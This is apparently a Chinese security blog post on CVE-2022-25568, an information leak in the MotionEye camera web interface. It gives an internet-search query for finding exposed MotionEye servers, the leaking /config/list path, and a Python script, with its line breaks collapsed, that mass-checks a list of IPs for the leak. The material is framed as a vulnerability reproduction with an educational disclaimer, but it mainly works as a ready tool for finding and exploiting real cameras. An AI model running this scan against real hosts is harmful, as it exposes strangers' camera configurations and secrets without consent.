参考：

• MotionEye 视频监控组件 list 信息泄漏洞 CVE-2022-25568 | PeiQi文库 (wgpsec.org)

一、漏洞描述：

motionEye是用Python写的motion的Web前端，它可以监视视频信号并检测运动。它可以与多种类型的摄像机配合使用,也可以与电影文件一起使用,从而使您可以分析录制的视频，其中存在一个信息泄漏漏洞，通过构造特定的URL即可获取服务器敏感信息

漏洞影响

• MotionEye <= v0.42.1

二、fofa搜索：

banner="motionEye"

这里可以写的脚本将fofa上的ip爬取保存，或者你们百度搜索应该也有：Python教程：如何用Python编写FOFA爬虫获取信息？_fofa python-CSDN博客

 

验证POC

/config/list

三、漏洞复现

这里我就根据原文提供的验证POC编写脚本进行批量验证复现

import requests# 读取文件中的 URL
with open('ip.txt', 'r') as file:urls = file.readlines()# 逐个验证 URL
for url in urls:url = url.strip()  # 去掉换行符full_url = f"{url}/config/list"try:response = requests.get(full_url, timeout=5)  # 设置超时时间为 5 秒if response.status_code == 200:if 'cameras' in response.text:print(f"URL: {full_url} - 状态码: 200 - 响应中包含 'cameras'")except requests.exceptions.RequestException as e:print(f"请求错误: {full_url} - 错误: {e}")

 

免责声明

欢迎访问我的博客。以下内容仅供教育和信息用途：

1. 合法性：我不支持或鼓励非法活动。请确保遵守法律法规。
2. 信息准确性：尽管我尽力提供准确的信息，但不保证其完全准确或适用。使用前请自行验证。
3. 风险提示：技术使用可能带来风险，如系统损坏或数据丢失。请谨慎使用，并自行承担风险。
4. 责任限制：我对使用博客内容产生的任何损害不承担责任。
5. 第三方链接：博客中的链接仅为方便用户，内容不由我负责。

使用本博客即表示您同意以上条款。如果有疑问，请联系我。